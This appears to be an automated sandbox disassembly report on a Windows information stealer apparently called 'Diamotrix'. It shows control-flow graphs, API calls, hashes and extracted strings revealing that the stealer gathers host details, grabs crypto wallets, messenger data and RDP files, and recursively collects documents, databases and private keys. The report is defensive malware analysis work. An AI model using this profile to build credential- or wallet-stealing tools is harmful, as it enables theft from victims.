7ff7f1322dc7 FreeEnvironmentStringsW 93187->93188 93188->93184 93189->93177 93190 7ff7f12825c0 93191 7ff7f12825de 93190->93191 93197 7ff7f12825ef 93190->93197 93192 7ff7f1282671 93193 7ff7f1282694 93192->93193 93194 7ff7f1282380 78 API calls 93192->93194 93198 7ff7f12826b4 __vcrt_freefls 93193->93198 93199 7ff7f1283e00 93193->93199 93194->93193 93196 7ff7f1282380 78 API calls 93196->93197 93197->93191 93197->93192 93197->93196 93202 7ff7f1283e0e 93199->93202 93200 7ff7f1283e12 93200->93198 93201 7ff7f1283e39 93203 7ff7f1283e4d 93201->93203 93206 7ff7f131b6e0 11 API calls 93201->93206 93202->93200 93202->93201 93205 7ff7f131b6e0 11 API calls 93202->93205 93204 7ff7f1283e61 93203->93204 93207 7ff7f131b6e0 11 API calls 93203->93207 93204->93198 93205->93201 93206->93203 93207->93204 93208 7ff7f1282da0 93209 7ff7f1282dbc 93208->93209 93210 7ff7f1282dcd 93208->93210 93212 7ff7f1303fbc 76 API calls 93210->93212 93214 7ff7f1283790 93210->93214 93211 7ff7f1282ec8 __vcrt_freefls 93212->93211 93215 7ff7f1303fbc 93214->93215 93216 7ff7f1303e98 76 API calls 93215->93216 93217 7ff7f1304005 93216->93217 93218 7ff7f130402a 93217->93218 93222 7ff7f1302e1c 47 API calls 2 library calls 93217->93222 93220 7ff7f130403f 93218->93220 93223 7ff7f1302e1c 47 API calls 2 library calls 93218->93223 93220->93211 93222->93218 93223->93220
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Name$InfoSystemUser_invalid_parameter_noinfo_noreturn$ClientComputerCurrentDefaultDesktopFileFirmwareGlobalLanguageLocaleMemoryModuleProfileRectStatusTableVersionWindow
                    • String ID: MB$ x $BIOS Version: $BMSR$Computer Name: $Diamotrix$Ex0Z$File_Grabber$GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==$GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW$HWID: $IQQOBwY=$Install Path: $MAwMHQ==$MRoEHzAQEx0ZZ10=$MRoEHzAQEx0ZZ1o=$MRoEHzAQEx0ZZ1s=$Messengers$MwwDGwYRBQ==$Number of Processors: $Page Size: $Processor Architecture: $Processor Type: $RAM Size: $RDP.txt$Screen Resolution: $System Language: $User Name: $Wallets$Windows Version: $\File_Grabber$\Messengers$\Wallets$nfo.txt
                    • API String ID: 2650910916-3668073628
                    • Opcode ID: 611cf05ff18014f2846dc4db441deb76e8daa8ca6df2b345875ed45aa5251317
                    • Instruction ID: 71dc3100c6ec65fee5126b9b43cb9efb3206b03184ce10473b691fe1f119ae06
                    • Opcode Fuzzy Hash: 611cf05ff18014f2846dc4db441deb76e8daa8ca6df2b345875ed45aa5251317
                    • Instruction Fuzzy Hash: C603E463E18BC686EB00EB64D4500ADA361FFD5794F90133AE6AD42AD9DFBCE540C790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                    • String ID: ,$1NfB14ikSwU5oDzNYQh7b35gksJRQW9bgy=$1NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyIQMFAA4=$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$GDUkFQAQBxokGA==$GDUmAgATHgwkGCoJHwAZFzUkERoEH08wEx0ZGDUlCAkVBwUMGDUtAgwVHkk9PB0EAxwdHQdYFwwVGQYaFRo=$GDUsBAwGHRoXIh091NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyIQAXEwVYAREVCAEHGwYWZDoEGRsdHA4L$IQ41NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyINA4FHQc=$IQMDDAMWEwIXNAUCBQMTGgwbIAgNAAoRFwgSKgAMBQI=$IREOCRoHXB4ZKAUEGQ==$IgEDAgcdHwgdKAsOBR8eEAsUIAoPCgwaExkWIAYFBx8=$IgoHDgkYHg8WIAUOAAscEAwQLgMCAgYZEA4XIg0PDgg=$KA4DBwcQGQMVNA4LCgwWEQ0ULAIOBgQXGRkSKQwFCgw=$KQoOBQYYHAoaIggJDwITFgMTJhkEAAwXGwAXKA4CCgo=$KgIDBAcSEAwXIwgEDAARGgUdIgcKAgsWFw8fNA4KAwE=$KwMGCgIXGgUfLAcLAQ4EHw8aKgMJAgMSGAIRLQ0DDgc=$KxkCCh8SHwAILQ0DCh8RHAEVJQMODAUEEAYaNBkFBAM=$LA0OBgYRGAcILQQABgoQGggSLA0NDgoTFxkULQYABQs=$LAQEAg0aFAceJwQFBgsXHwUaKA4ACgISAg8aKwAEDAk=$NAEKDw4ZFw8RKg4GAA4fFQIUNAINBwUZFQAaKwEPDw4=$NAsRBwQXHg0SLQ8HDgcTEAsWIAQJAgUdEwoaIw8NBQ4=$\*.*
                    • API String ID: 3936042273-491062771
                    • Opcode ID: 5494cb3126ffeae7d3fb69440a20562dbea0d196dce64852b158d1e03fa1fc3f
                    • Instruction ID: e2ec9cd9836681e8efc99228ac4b5f8e589b7b5dcbfb26989a5a31d44d6e5d68
                    • Opcode Fuzzy Hash: 5494cb3126ffeae7d3fb69440a20562dbea0d196dce64852b158d1e03fa1fc3f
                    • Instruction Fuzzy Hash: FEE2B363E19BC686EB10EB74D4500FDA321FF95394F905326E6AD529DADFACE240C390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$Directory$Concurrency::cancel_current_taskCreateCurrent
                    • String ID: Diamotrix$Ex0Z$File_Grabber$GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==$GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW$IQQOBwY=$MAwMHQ==$MRoEHzAQEx0ZZ10=$MRoEHzAQEx0ZZ1o=$MRoEHzAQEx0ZZ1s=$Messengers$MwwDGwYRBQ==$RDP.txt$Wallets$\File_Grabber$\Messengers$\Wallets$nfo.txt
                    • API String ID: 4040021279-1265026603
                    • Opcode ID: c2728f9c4670e31866b708728e7fd16e3e167682e0f77b9633d6d489b83192e3
                    • Instruction ID: 03ea547d7983173d8c137d68cbc885b4ee2e9e17b5ed2916856ef5e73f021966
                    • Opcode Fuzzy Hash: c2728f9c4670e31866b708728e7fd16e3e167682e0f77b9633d6d489b83192e3
                    • Instruction Fuzzy Hash: 3DD2BF63E18BC683EB00EB64D4500ADA361FFD5794F901326F6AD52AD9DFACE540C790

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1698 7ff7f132ddd8-7ff7f132de30 wsprintfW FindFirstFileW 1699 7ff7f132e056-7ff7f132e072 1698->1699 1700 7ff7f132de36 1698->1700 1701 7ff7f132de39-7ff7f132de3e 1700->1701 1702 7ff7f132dfc6-7ff7f132dfd1 1701->1702 1703 7ff7f132de44-7ff7f132de63 1701->1703 1706 7ff7f132dfee-7ff7f132dffa call 7ff7f132e0e4 1702->1706 1707 7ff7f132dfd3-7ff7f132dfd6 1702->1707 1704 7ff7f132de69-7ff7f132dea7 wsprintfW PathFindExtensionW StrCmpIW 1703->1704 1705 7ff7f132e037-7ff7f132e047 FindNextFileW 1703->1705 1711 7ff7f132dead-7ff7f132debf StrCmpIW 1704->1711 1712 7ff7f132dfb5-7ff7f132dfbf call 7ff7f132e07c 1704->1712 1705->1701 1710 7ff7f132e04d-7ff7f132e050 FindClose 1705->1710 1706->1705 1719 7ff7f132dffc-7ff7f132e026 wsprintfW call 7ff7f132e188 1706->1719 1707->1705 1708 7ff7f132dfd8-7ff7f132dfde 1707->1708 1708->1706 1714 7ff7f132dfe0-7ff7f132dfe4 1708->1714 1710->1699 1711->1712 1713 7ff7f132dec5-7ff7f132ded7 StrCmpIW 1711->1713 1720 7ff7f132dfc4 1712->1720 1713->1712 1717 7ff7f132dedd-7ff7f132deef StrCmpIW 1713->1717 1714->1706 1718 7ff7f132dfe6-7ff7f132dfec 1714->1718 1717->1712 1721 7ff7f132def5-7ff7f132df07 StrCmpIW 1717->1721 1718->1705 1718->1706 1719->1705 1726 7ff7f132e028-7ff7f132e032 call 7ff7f132ddd8 1719->1726 1720->1705 1721->1712 1723 7ff7f132df0d-7ff7f132df1f StrCmpIW 1721->1723 1723->1712 1725 7ff7f132df25-7ff7f132df37 StrCmpIW 1723->1725 1725->1712 1727 7ff7f132df39-7ff7f132df4b StrCmpIW 1725->1727 1726->1705 1727->1712 1729 7ff7f132df4d-7ff7f132df5f StrCmpIW 1727->1729 1729->1712 1730 7ff7f132df61-7ff7f132df73 StrCmpIW 1729->1730 1730->1712 1731 7ff7f132df75-7ff7f132df87 StrCmpIW 1730->1731 1731->1712 1732 7ff7f132df89-7ff7f132df9b StrCmpIW 1731->1732 1732->1712 1733 7ff7f132df9d-7ff7f132dfaf StrCmpIW 1732->1733 1733->1705 1733->1712
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Find$wsprintf$File$CloseExtensionFirstNextPath
                    • String ID: %s\%s$%s\%s$%s\*$.$.cpp$.csv$.dat$.db$.docx$.jpg$.pdf$.pkey$.py$.sql$.txt$.wallet
                    • API String ID: 3740071514-485090699
                    • Opcode ID: 5e8ed4e0d74950a1803d94b8335d5763838339ad019a5827a8596f3473a7e5c3
                    • Instruction ID: abb9c0c90aca70b15c0a657eeeaa2dadcc7e7b48050a788fd964460936a3fb1a
                    • Opcode Fuzzy Hash: 5e8ed4e0d74950a1803d94b8335d5763838339ad019a5827a8596f3473a7e5c3
                    • Instruction Fuzzy Hash: F6713A21A08A8793FB64BB11E8506B5E360FF44B84FC4507AC92D466D8DFBCF549E3A4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$Directory$CreateCurrent$FileFindFirstFolderPath
                    • String ID: Diamotrix$Ex0Z$File_Grabber$GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==$GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW$IQQOBwY=$MAwMHQ==$MRoEHzAQEx0ZZ10=$MRoEHzAQEx0ZZ1o=$MRoEHzAQEx0ZZ1s=$Messengers$MwwDGwYRBQ==$RDP.txt$Wallets$\File_Grabber$\Messengers$\Wallets$nfo.txt
                    • API String ID: 2602529875-1265026603
                    • Opcode ID: f03e0394297efdcfb9fee5656acbe66687bd17c58800006372adf50f4d704cea
                    • Instruction ID: 5703ef6947dc012f302c01fc1605f295aaab742ddf0ee88821a7225cbc00148f
                    • Opcode Fuzzy Hash: f03e0394297efdcfb9fee5656acbe66687bd17c58800006372adf50f4d704cea
                    • Instruction Fuzzy Hash: 60E2B163E18BC683EB00EB64D4400ADA361FFD9794F905326FAAD529D9DFACE540C790

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2546 7ff7f132fa1c-7ff7f132fa53 call 7ff7f1330b3c 2549 7ff7f132fa55-7ff7f132fa5c 2546->2549 2549->2549 2550 7ff7f132fa5e-7ff7f132faa1 call 7ff7f128a7dc 2549->2550 2553 7ff7f132fab6-7ff7f132fac2 call 7ff7f12902d0 2550->2553 2554 7ff7f132faa3-7ff7f132fab4 2550->2554 2555 7ff7f132fac3-7ff7f132fdc5 call 7ff7f1330c3c SetCurrentDirectoryW CreateDirectoryW call 7ff7f1290040 call 7ff7f12900b4 call 7ff7f128f840 SetCurrentDirectoryW * 2 CreateDirectoryW call 7ff7f1290040 SetCurrentDirectoryW call 7ff7f13312a4 call 7ff7f12906c4 call 7ff7f1330cd8 call 7ff7f12906c4 call 7ff7f1331110 call 7ff7f12906c4 call 7ff7f1332b70 call 7ff7f132eb30 SetCurrentDirectoryW CreateDirectoryW call 7ff7f1290040 SetCurrentDirectoryW call 7ff7f12906c4 call 7ff7f132e7cc SetCurrentDirectoryW call 7ff7f12906c4 call 7ff7f132d5f4 call 7ff7f132e23c 2553->2555 2554->2555 2596 7ff7f132fdc7-7ff7f132fdd4 2555->2596 2597 7ff7f132fdf4-7ff7f132fe0f GetSystemMetrics 2555->2597 2598 7ff7f132fdef call 7ff7f12fa2bc 2596->2598 2599 7ff7f132fdd6-7ff7f132fde9 2596->2599 2600 7ff7f132fe8d-7ff7f132ff23 CreateDirectoryW call 7ff7f1290040 call 7ff7f132e1f0 call 7ff7f132ddd8 SetCurrentDirectoryW 2597->2600 2601 7ff7f132fe11-7ff7f132fe88 call 7ff7f132d95c call 7ff7f1291f8c call 7ff7f12947c8 call 7ff7f1294a0c call 7ff7f1291e6c call 7ff7f1291f08 call 7ff7f12fd018 2597->2601 2598->2597 2599->2598 2602 7ff7f13300b3-7ff7f13300b8 call 7ff7f1303228 2599->2602 2623 7ff7f132ff38-7ff7f132ff47 call 7ff7f1295e80 2600->2623 2624 7ff7f132ff25-7ff7f132ff36 2600->2624 2601->2600 2612 7ff7f13300b9-7ff7f13300be call 7ff7f1303228 2602->2612 2622 7ff7f13300bf-7ff7f13300c7 call 7ff7f1303228 2612->2622 2626 7ff7f132ff48-7ff7f132ff6f 2623->2626 2624->2626 2630 7ff7f132ff74-7ff7f132ff7b 2626->2630 2630->2630 2633 7ff7f132ff7d-7ff7f132ff9e call 7ff7f128a7dc call 7ff7f13331f4 2630->2633 2642 7ff7f132ffcd-7ff7f133001a call 7ff7f128f840 * 5 2633->2642 2643 7ff7f132ffa0-7ff7f132ffad 2633->2643 2657 7ff7f133004a-7ff7f1330063 2642->2657 2658 7ff7f133001c-7ff7f133002e 2642->2658 2644 7ff7f132ffc8 call 7ff7f12fa2bc 2643->2644 2645 7ff7f132ffaf-7ff7f132ffc2 2643->2645 2644->2642 2645->2612 2645->2644 2661 7ff7f133008e-7ff7f13300ac 2657->2661 2662 7ff7f1330065-7ff7f1330072 2657->2662 2659 7ff7f1330030-7ff7f1330043 2658->2659 2660 7ff7f1330045 call 7ff7f12fa2bc 2658->2660 2659->2622 2659->2660 2660->2657 2664 7ff7f1330089 call 7ff7f12fa2bc 2662->2664 2665 7ff7f1330074-7ff7f1330087 2662->2665 2664->2661 2665->2664 2666 7ff7f13300ad-7ff7f13300b2 call 7ff7f1303228 2665->2666 2666->2602
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Directory$Current$CreateSystem$MetricsName_invalid_parameter_noinfo_noreturn$GdiplusUser$ClientComputerConcurrency::cancel_current_taskDefaultDesktopFileGlobalInfoInformationLanguageMemoryModuleProfileRectShutdownStartupStatusVersionVolumeWindowWindowswsprintf
                    • String ID: File_Grabber$Messengers$RDP.txt$Wallets$\File_Grabber$\Messengers$\Wallets$nfo.txt
                    • API String ID: 3063786011-3067865950
                    • Opcode ID: 439549d16cabb2dd88bfd4b447fe32fc0201ec5a38c8ef1c6304f43afd5e4987
                    • Instruction ID: 1bdd15f5acfff83b571b14e87db51bb886969668719cb3d4730305d1f13592b0
                    • Opcode Fuzzy Hash: 439549d16cabb2dd88bfd4b447fe32fc0201ec5a38c8ef1c6304f43afd5e4987
                    • Instruction Fuzzy Hash: AB12C363E18AC296EB00EF74D8500EDA371FF90758F901236EA6D529E9DFB8D584C790

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2670 7ff7f12b3e20-7ff7f12b3e3c 2671 7ff7f12b3e86-7ff7f12b3e8d call 7ff7f12ed880 2670->2671 2672 7ff7f12b3e3e-7ff7f12b3e50 WSAStartup 2670->2672 2681 7ff7f12b3e93-7ff7f12b3eb8 GetModuleHandleA 2671->2681 2682 7ff7f12b4099-7ff7f12b40b0 call 7ff7f12fa740 2671->2682 2673 7ff7f12b3e52-7ff7f12b3e59 2672->2673 2674 7ff7f12b3e69-7ff7f12b3e85 call 7ff7f12fa740 2672->2674 2676 7ff7f12b3e63 WSACleanup 2673->2676 2677 7ff7f12b3e5b-7ff7f12b3e61 2673->2677 2676->2674 2677->2671 2677->2676 2684 7ff7f12b3ec6-7ff7f12b3f02 GetProcAddress call 7ff7f130b6b0 2681->2684 2685 7ff7f12b3eba-7ff7f12b3ec1 2681->2685 2691 7ff7f12b3f04-7ff7f12b3f0a 2684->2691 2692 7ff7f12b3f2c-7ff7f12b3f2f 2684->2692 2687 7ff7f12b4054-7ff7f12b4091 call 7ff7f12ed430 QueryPerformanceFrequency 2685->2687 2687->2682 2694 7ff7f12b3f1e-7ff7f12b3f27 LoadLibraryA 2691->2694 2695 7ff7f12b3f0c-7ff7f12b3f19 2691->2695 2696 7ff7f12b3f31-7ff7f12b3f44 GetProcAddress 2692->2696 2697 7ff7f12b3f5b-7ff7f12b3f72 GetSystemDirectoryA 2692->2697 2698 7ff7f12b401c-7ff7f12b4036 2694->2698 2695->2698 2696->2697 2699 7ff7f12b3f46-7ff7f12b3f56 LoadLibraryExA 2696->2699 2700 7ff7f12b4014 2697->2700 2701 7ff7f12b3f78-7ff7f12b3f8b 2697->2701 2698->2687 2703 7ff7f12b4038-7ff7f12b404b GetProcAddress 2698->2703 2699->2698 2700->2698 2706 7ff7f12b3f8d-7ff7f12b3f9b GetSystemDirectoryA 2701->2706 2707 7ff7f12b400b 2701->2707 2703->2687 2705 7ff7f12b404d 2703->2705 2705->2687 2706->2707 2708 7ff7f12b3f9d-7ff7f12b3fa7 2706->2708 2707->2700 2709 7ff7f12b3fb0-7ff7f12b3fb9 2708->2709 2709->2709 2710 7ff7f12b3fbb 2709->2710 2711 7ff7f12b3fc1-7ff7f12b3fc8 2710->2711 2711->2711 2712 7ff7f12b3fca-7ff7f12b3fd7 2711->2712 2713 7ff7f12b3fe0-7ff7f12b3fec 2712->2713 2713->2713 2714 7ff7f12b3fee-7ff7f12b3ff4 2713->2714 2715 7ff7f12b4002 LoadLibraryA 2714->2715 2716 7ff7f12b3ff6-7ff7f12b4000 2714->2716 2717 7ff7f12b4008 2715->2717 2716->2717 2717->2707
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartup
                    • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                    • API String ID: 263636572-2794540096
                    • Opcode ID: 203f77c75b130e58b60de629065e69e61a1046895526e1403796fad7fc1493ba
                    • Instruction ID: 32540666f92ad461517cc36537308644fd86e461e21539f7dc005ac953e8d119
                    • Opcode Fuzzy Hash: 203f77c75b130e58b60de629065e69e61a1046895526e1403796fad7fc1493ba
                    • Instruction Fuzzy Hash: 7E61B521B0C6C682FB64FB59A4443B9A791BF49B80FC84034DD6E833D5EFACE00593A0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2881 7ff7f1330138-7ff7f13301af call 7ff7f1290040 FindFirstFileW 2884 7ff7f13305cc-7ff7f13305f8 call 7ff7f128f840 * 2 2881->2884 2885 7ff7f13301b5-7ff7f13301bc 2881->2885 2886 7ff7f1330471-7ff7f1330510 call 7ff7f1290040 call 7ff7f1295fec call 7ff7f128f840 call 7ff7f1290040 call 7ff7f1295fec call 7ff7f128f840 CopyFileW 2885->2886 2887 7ff7f13301c2-7ff7f13301dd 2885->2887 2924 7ff7f1330549-7ff7f1330564 2886->2924 2925 7ff7f1330512-7ff7f1330529 2886->2925 2889 7ff7f13301e1-7ff7f13301e9 2887->2889 2889->2889 2893 7ff7f13301eb-7ff7f1330213 call 7ff7f128f8e8 call 7ff7f1296068 2889->2893 2905 7ff7f1330219-7ff7f133022c call 7ff7f1296068 2893->2905 2906 7ff7f1330462-7ff7f133046c call 7ff7f128f840 2893->2906 2905->2906 2914 7ff7f1330232-7ff7f1330238 2905->2914 2915 7ff7f13305aa-7ff7f13305bc FindNextFileW 2906->2915 2918 7ff7f133023e-7ff7f1330241 2914->2918 2919 7ff7f133045b 2914->2919 2915->2885 2916 7ff7f13305c2-7ff7f13305cb FindClose 2915->2916 2916->2884 2921 7ff7f1330246-7ff7f133024e 2918->2921 2919->2906 2922 7ff7f1330250 2921->2922 2923 7ff7f1330253-7ff7f1330268 2921->2923 2922->2923 2928 7ff7f133026e-7ff7f1330274 2923->2928 2929 7ff7f1330444-7ff7f133044e 2923->2929 2926 7ff7f133059a-7ff7f13305a6 2924->2926 2927 7ff7f1330566-7ff7f133057c 2924->2927 2930 7ff7f133052b-7ff7f133053e 2925->2930 2931 7ff7f1330544 call 7ff7f12fa2bc 2925->2931 2926->2915 2932 7ff7f133057e-7ff7f1330591 2927->2932 2933 7ff7f1330593-7ff7f1330598 call 7ff7f12fa2bc 2927->2933 2934 7ff7f1330290-7ff7f133035e call 7ff7f1290040 call 7ff7f12900b4 call 7ff7f128f840 call 7ff7f1290040 call 7ff7f12900b4 call 7ff7f1290240 call 7ff7f12900b4 2928->2934 2935 7ff7f1330276 2928->2935 2929->2921 2936 7ff7f1330454 2929->2936 2930->2931 2937 7ff7f13305f9-7ff7f13305fe call 7ff7f1303228 2930->2937 2931->2924 2932->2933 2939 7ff7f13305ff-7ff7f1330604 call 7ff7f1303228 2932->2939 2933->2926 2965 7ff7f1330397-7ff7f13303f9 call 7ff7f128f840 * 2 CreateDirectoryW 2934->2965 2966 7ff7f1330360-7ff7f1330377 2934->2966 2941 7ff7f1330279-7ff7f1330280 2935->2941 2936->2919 2937->2939 2951 7ff7f1330605-7ff7f1330621 call 7ff7f1303228 2939->2951 2941->2929 2946 7ff7f1330286-7ff7f133028e 2941->2946 2946->2934 2946->2941 2974 7ff7f13303fe-7ff7f1330441 call 7ff7f12906c4 call 7ff7f1330138 call 7ff7f128f840 * 2 2965->2974 2975 7ff7f13303fb 2965->2975 2967 7ff7f1330379-7ff7f133038c 2966->2967 2968 7ff7f1330392 call 7ff7f12fa2bc 2966->2968 2967->2951 2967->2968 2968->2965 2974->2929 2975->2974
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$FileFind$CloseCopyCreateDirectoryFirstNext
                    • String ID: \*.*
                    • API String ID: 1453831035-1173974218
                    • Opcode ID: 4fcc55e0a014fdbd900b34abe555f67c845752b6d4535b633dbd074b0a4f6076
                    • Instruction ID: c8feca0a1394dbab3191acc862defc28842d935ab0f1baa28523fd1fa9364f85
                    • Opcode Fuzzy Hash: 4fcc55e0a014fdbd900b34abe555f67c845752b6d4535b633dbd074b0a4f6076
                    • Instruction Fuzzy Hash: 49D1FC72B18A8196EB10EB74D4403EDB360FF44794F805236EA6D93AD9DFB8D684C350

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2984 7ff7f129d690-7ff7f129d6e2 2985 7ff7f129d6e8-7ff7f129d6ee 2984->2985 2986 7ff7f129dc1d 2984->2986 2985->2986 2987 7ff7f129d6f4-7ff7f129d6fb 2985->2987 2988 7ff7f129dc22-7ff7f129dc3f call 7ff7f12fa740 2986->2988 2989 7ff7f129d707-7ff7f129d70a 2987->2989 2990 7ff7f129d6fd-7ff7f129d702 2987->2990 2992 7ff7f129d716-7ff7f129d751 call 7ff7f12c4da0 call 7ff7f12a04c0 2989->2992 2993 7ff7f129d70c-7ff7f129d711 2989->2993 2990->2988 2999 7ff7f129d792-7ff7f129d7a6 call 7ff7f12a4c20 2992->2999 3000 7ff7f129d753-7ff7f129d77c call 7ff7f12a04b0 call 7ff7f129c040 call 7ff7f12c4c00 2992->3000 2993->2988 3006 7ff7f129d901-7ff7f129d907 2999->3006 3007 7ff7f129d7ac-7ff7f129d7c5 2999->3007 3000->3006 3024 7ff7f129d782-7ff7f129d790 call 7ff7f12a0750 3000->3024 3009 7ff7f129dbfe-7ff7f129dc1b call 7ff7f12c4d70 3006->3009 3010 7ff7f129d7c7-7ff7f129d7cc 3007->3010 3011 7ff7f129d82d-7ff7f129d839 3007->3011 3009->2988 3016 7ff7f129d7d0-7ff7f129d815 call 7ff7f12c4d60 3010->3016 3012 7ff7f129d83f 3011->3012 3013 7ff7f129d90c-7ff7f129d927 call 7ff7f129d570 3011->3013 3017 7ff7f129d842-7ff7f129d86a 3012->3017 